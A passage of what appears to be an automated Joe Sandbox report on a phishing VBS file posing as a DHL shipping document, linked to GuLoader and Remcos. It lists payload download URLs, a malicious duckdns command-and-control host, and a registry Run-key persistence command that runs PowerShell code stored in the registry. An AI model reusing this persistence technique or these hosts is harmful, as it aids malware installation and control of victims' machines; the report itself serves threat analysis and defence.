              https://www.office.com/0%Avira URL Cloudsafe
              https://contemega.com.do/Nedslagn0%Avira URL Cloudsafe
              https://contemega.com.do/zPwwF47.bin0%Avira URL Cloudsafe
              https://contemega.com.do/Nedslag0%Avira URL Cloudsafe
              http://microsoft.co0%Avira URL Cloudsafe
              https://moviesmacktalk.com/Ne0%Avira URL Cloudsafe
              http://www.imvu.com0%Avira URL Cloudsafe
              https://moviesmacktalk.com/Nedslagnings.dwpX0%Avira URL Cloudsafe
              https://moviesmacktalk.com/Nedslagnings0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=wsb0%Avira URL Cloudsafe
              https://moviesmacktalk.co0%Avira URL Cloudsafe
              https://contemega.com.do/Ne0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              https://moviesmacktalk.com/N0%Avira URL Cloudsafe
              https://moviesmacktalk.com/Nedslagnings.dw0%Avira URL Cloudsafe
              https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5b&0%Avira URL Cloudsafe
              http://contemega.com.do0%Avira URL Cloudsafe
              https://contemega.com.do/Ned0%Avira URL Cloudsafe
              https://contemega.com.do/Nedslagnings0%Avira URL Cloudsafe
              https://rum18.perf.linkedin.com/apc/trans.gif?481b7caa9fdb7105b2103a83008118770%Avira URL Cloudsafe
              http://crl.micro0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingaot0%Avira URL Cloudsafe
              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe
              https://moviesmacktalk.com0%Avira URL Cloudsafe
              https://contemega.com0%Avira URL Cloudsafe
              https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
              https://moviesmacktalk.com/Ned0%Avira URL Cloudsafe
              https://moviesmacktalk.com/Nedslagnings.dwp0%Avira URL Cloudsafe
              https://moviesmacktalk.com/Nedsla0%Avira URL Cloudsafe
              http://www.ebuddy.com0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              janbours92harbu02.duckdns.org
              		206.123.148.194
              		truetrue
                		unknown
                geoplugin.net
                		178.237.33.50
                		truefalse
                  		unknown
                  contemega.com.do
                  		192.185.112.252
                  		truefalse
                    		unknown
                    171.39.242.20.in-addr.arpa
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://contemega.com.do/Nedslagnings.dwpfalse
                        		unknown
                        https://contemega.com.do/zPwwF47.binfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://geoplugin.net/json.gpfalse
                        • URL Reputation: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DesusertionEndpoint=PbhvB999.tmp.19.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://moviesmacktalk.com/Nedslagnings.powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://moviesmacktalk.com/Nedslpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.Pb)mpowershell.exe, 00000002.00000002.1943692775.000001379AA2E000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://moviesmacktalk.cpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.comrwab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://moviesmacktalk.com/Nedslagnpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.do/Nedslagningpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://aefd.nelreports.net/api/report?cat=bingthbhvB999.tmp.19.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.dpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.do/Nedspowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.cpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://moviesmacktalk.com/Nedslagpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.do/Npowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.dopowershell.exe, 00000002.00000002.1943692775.0000013798ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.000001379AA2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.comawab.exe, 00000016.00000002.1996776338.000000000334D000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.nirsoft.netwab.exe, 00000013.00000002.2021961381.0000000003293000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://aefd.nelreports.net/api/report?cat=bingaotakbhvB999.tmp.19.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.do/Nedslagnings.dpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://deff.nelreports.net/api/report?cat=msnbhvB999.tmp.19.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.do/Nedslagninpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://edd27623571fc427dc1f8d6ba04dd39f.clo.footprintdns.com/apc/trans.gif?b37f6b94dfddf29d58d90046bhvB999.tmp.19.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://moviesmacktalk.com/Nedspowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://moviesmacktalk.com/Nedslagningpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.do/powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2246278943.000000000051A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://rum18.perf.linkedin.com/apc/trans.gif?d99a5c14daed171e4daf3a2c1226bd16bhvB999.tmp.19.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.comwab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://moviesmacktalk.com/Nedslagninpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.do/Nedslagnings.powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.do/Nedslagnipowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.1845384623.0000000004881000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhvB999.tmp.19.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2047294756.00000137A8D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://moviesmacktalk.com/Nedslagnipowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.do/Nedslpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.do/Nedslagnings.dwpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://login.yahoo.com/config/loginwab.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.do/zPwwF47.binOptjsLanmoviesmacktalk.com/zPwwF47.binwab.exe, 0000000A.00000002.2261933839.0000000022470000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.nirsoft.net/wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1943692775.0000013798CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.0000000004881000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contemega.copowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://moviesmacktalk.com/powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5c&bhvB999.tmp.19.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://moviesmacktalk.com/Nedslagnings.dpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.do/Nedslapowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.office.com/bhvB999.tmp.19.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2047294756.00000137A8D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contemega.com.do/Nedslagnpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.do/Nedslagpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://microsoft.copowershell.exe, 00000002.00000002.2065998160.00000137B12D5000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://go.micropowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://moviesmacktalk.com/Nepowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://moviesmacktalk.com/Nedslagnings.dwpXpowershell.exe, 00000002.00000002.1943692775.0000013798ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.000001379A562000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.imvu.comwab.exe, wab.exe, 00000016.00000002.1996776338.000000000334D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://aefd.nelreports.net/api/report?cat=wsbbhvB999.tmp.19.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://moviesmacktalk.copowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://moviesmacktalk.com/Nedslagningspowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.do/Nepowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://moviesmacktalk.com/Npowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://moviesmacktalk.com/Nedslagnings.dwpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5b&bhvB999.tmp.19.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.do/Nedpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://contemega.com.dopowershell.exe, 00000002.00000002.1943692775.000001379AA8C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contemega.com.do/Nedslagningspowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://rum18.perf.linkedin.com/apc/trans.gif?481b7caa9fdb7105b2103a8300811877bhvB999.tmp.19.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.micropowershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://aefd.nelreports.net/api/report?cat=bingaotbhvB999.tmp.19.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgbhvB999.tmp.19.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://aefd.nelreports.net/api/report?cat=bingrmsbhvB999.tmp.19.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://moviesmacktalk.compowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.com/accounts/serviceloginwab.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://moviesmacktalk.com/Nedslapowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://aka.ms/pscore68powershell.exe, 00000002.00000002.1943692775.0000013798CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contemega.compowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://moviesmacktalk.com/Nedpowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://moviesmacktalk.com/Nedslagnings.dwppowershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.ebuddy.comwab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        178.237.33.50
                        		geoplugin.netNetherlands
                        		8455ATOM86-ASATOM86NLfalse
                        192.185.112.252
                        		contemega.com.doUnited States
                        		46606UNIFIEDLAYER-AS-1USfalse
                        206.123.148.194
                        		janbours92harbu02.duckdns.orgUnited States
                        		9009M247GBtrue

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1465419
                        Start date and time:2024-07-01 16:18:11 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 5s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:25
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:DHL Shipping Document Awb & BL.vbs
                        Detection:MAL
                        Classification:mal100.phis.troj.spyw.expl.evad.winVBS@31/12@12/3
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HCA Information:
                        • Successful, ratio: 96%
                        • Number of executed functions: 176
                        • Number of non-executed functions: 282
                        Cookbook Comments:
                        • Found application associated with file extension: .vbs

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 7548 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7792 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: DHL Shipping Document Awb & BL.vbs

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        10:19:03API Interceptor125x Sleep call for process: powershell.exe modified
                        10:20:26API Interceptor8x Sleep call for process: wab.exe modified
                        15:19:50AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run gstes %Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)
                        15:19:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run gstes %Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        178.237.33.50tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                        • geoplugin.net/json.gp
                        TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • geoplugin.net/json.gp
                        Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        Quotation.xlsGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • geoplugin.net/json.gp
                        Maersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • geoplugin.net/json.gp
                        Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • geoplugin.net/json.gp
                        192.185.112.252TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                          DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoaderBrowse
                            206.123.148.194TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                              Maersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                DHL Shipping Invoice & Awb8289djuejeeoffffdelivery.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                  Deutschepost Invoice & Awb0000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                    DHL Shipping Invoice, Bill Of Lading & AWB.vb.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                      MaerskPreawbsamedaydelivery636489384759390200.vbsGet hashmaliciousGuLoader, RemcosBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        janbours92harbu02.duckdns.orgTOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 206.123.148.194
                                        Maersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 206.123.148.194
                                        DHL Shipping Invoice & Awb8289djuejeeoffffdelivery.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 206.123.148.194
                                        Deutschepost Invoice & Awb0000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 206.123.148.194
                                        Transaction_Execution_Confirmation_000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 206.123.148.196
                                        DHL Shipping Invoice, Bill Of Lading & AWB.vb.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 206.123.148.194
                                        MaerskPreawbsamedaydelivery636489384759390200.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 206.123.148.194
                                        DHL_Shipping_Invoice_Awb_0000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 194.55.186.124
                                        contemega.com.doTOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 192.185.112.252
                                        DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoaderBrowse
                                        • 192.185.112.252
                                        geoplugin.nettWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                                        • 178.237.33.50
                                        TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 178.237.33.50
                                        Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        Quotation.xlsGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 178.237.33.50
                                        Maersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 178.237.33.50
                                        Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 178.237.33.50

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        UNIFIEDLAYER-AS-1USyVtOz1fD5G.exeGet hashmaliciousAgentTeslaBrowse
                                        • 162.241.62.63
                                        F46VBJ6Yvy.exeGet hashmaliciousAgentTeslaBrowse
                                        • 192.254.225.136
                                        8w5wHh755H.exeGet hashmaliciousAgentTeslaBrowse
                                        • 192.185.143.105
                                        TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 192.185.112.252
                                        MV RIVA WIND - VESSEL's PARTICULARS.PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                        • 50.87.144.157
                                        h8N9qpyRAPaiitu.exeGet hashmaliciousFormBookBrowse
                                        • 50.87.148.119
                                        Att0027592.exeGet hashmaliciousFormBookBrowse
                                        • 162.240.81.18
                                        awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 192.185.217.247
                                        DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoaderBrowse
                                        • 192.185.112.252
                                        invoice__ pdf.wsfGet hashmaliciousGuLoaderBrowse
                                        • 192.185.76.254
                                        ATOM86-ASATOM86NLtWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                                        • 178.237.33.50
                                        TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 178.237.33.50
                                        Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        Quotation.xlsGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 178.237.33.50
                                        Maersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        • 178.237.33.50
                                        Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 178.237.33.50
